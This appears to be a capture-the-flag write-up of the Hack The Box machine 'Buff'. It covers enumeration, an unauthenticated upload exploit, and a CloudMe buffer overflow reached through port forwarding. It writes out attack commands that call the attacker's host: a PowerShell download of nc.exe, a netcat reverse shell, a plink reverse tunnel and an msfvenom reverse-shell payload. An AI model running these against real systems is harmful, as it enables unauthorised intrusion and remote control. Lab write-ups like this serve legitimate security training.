Buff is a windows box that features the website for a Gym Membership software and a simple Window stack based buffer overflow.
Scanning and Enumeration
First thing to note about this box is it seems to have some odd things port wise. Example of that below. The only port that should be open is 8080. There isn’t anything to do with the other ports and we aren’t sure why it shows up consistently.
nightwolf@kali:~/CTFs/HTB/Buff$ sudo nmap -A -p- 10.10.10.198
[sudo] password for nightwolf:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-18 13:08 MDT
Nmap scan report for 10.10.10.198
Host is up (0.41s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 82.14 ms 10.10.14.1
2 778.91 ms 10.10.10.198
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 258.90 seconds
Seems like there is a web page server on port 8080. Let’s go take a look.
Rabbitholes
I fell down a rabbithole to start with. There is a /Admin page that seems like a place where we could maybe upload a php shell.
The file upload is disabled but we can fix that.
We play around with it a bit but don’t seem to make much progress so we start to look around again.
Foothold
We eventually climb out of the rabbithole and take a look around the site again. We take a look at /contact.php
This tells us the name and version of the gym site’s webapp.
We run a google search on it and found it has a lovely vulnerability. https://www.exploit-db.com/exploits/48506 This takes advantage of the fact that /upload.php does not check for authentication before allowing uploads. Uploaded files are supposed to only be images but this can be circumvented by adding an image extension on the end of our php shell.
We pull it down, run it, and instantly drop into a php shell.
We are unable to change directories, since our “shell” is acutally just a wrapper to send commands nicely to our uploaded php file. but we do have the permissions of the user Shaun. Which allows us to retrieve user.txt.
C:\xampp\htdocs\gym\upload> type C:\Users\shaun\Desktop\user.txt
Shell Stabilization
We were able to get our user flag but we are in a really crappy webshell. We need something better going forward. We download a windows netcat binary from https://github.com/int0x33/nc.exe/blob/master/nc.exe .
Then we go to the directory it was downloaded in and start a python http server.
sudo python3 -m http.server 80 We also start a listener with netcat to catch our revers shell. nc -lnvp 3698
Once our server and listener is up. is up we use powershell to transfer the file over and then run use netcat to start our reverse shell.
powershell -c IEX(New-Object Net.WebClient).DownloadFile('http://10.10.14.24/nc.exe', 'nc.exe')
.\nc.exe -e cmd.exe 10.10.14.24 3968
Catch our shell, and it is time to start looking for a way to get to root.
Root
We check the running processes and find one that is rather stands out. CloudMe.exe There is also a version of this binary in one of our users folders.
We quickly find an exploit on Exploit DB that seems to likely be applicable. https://www.exploit-db.com/exploits/44470
From conversation with others this one works as well. https://www.exploit-db.com/exploits/48389
However, there is one challenge. CloudMe does not have a public facing port. We can see the port it uses 8888 is open with netstat -an |find /i "listening" command But we can’t see it externally. It is only listening for internal connections.
We also can’t simply run our exploit in our current shell because this system does not have python installed. There are probably a few ways around this. We could maybe rewrite the exploit in another language, or pack it up into an executable, but I opted to set up port forwarding with plink.
First, we start the ssh service on our attacking machine with, sudo service ssh start.
Then we transfer plink over the same way we did for netcat and run, .\plink.exe -v -x -R 4444:127.0.0.1:8888 nightwolf@10.10.14.24
We enter our password and plink opens the connection.
HTB SSH Network changes
Not long after I completed this box HTB made some changes to the types of traffic permitted on their networks. SSH connections from target boxes to player machines are now blocked on port 22.
Because of this we need to take some other options. We can change the port used by SSH to a port other than port 22, or we can use another tool, such as Chisel.
Root: Continued
Now we just need to set up our payload. First we change the target connection port to 4444 to match our port forward then we generate the shell code for our reverse shell using msfvenom.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.24 LPORT=3271 -f c
We start a listener on our local machine with nc -lnvp 3271 Time to cross our fingers and hope it works.
Our connections goes through and our listener catches the reverse shell.
We check and we have Administrator rights. Type to snag the flag for submission and we are all done!
Wrapup
This was one of the first boxes I attempted when returning to HTB and I think it was a pretty good box to start with. It has a few rabbit holes that are easy to slip into but is overall fairly easy and straight forward. The port forwarding aspect was pretty fun to learn and I have certainly made use of it later. Thanks egotisticalSW for creating an awesome box!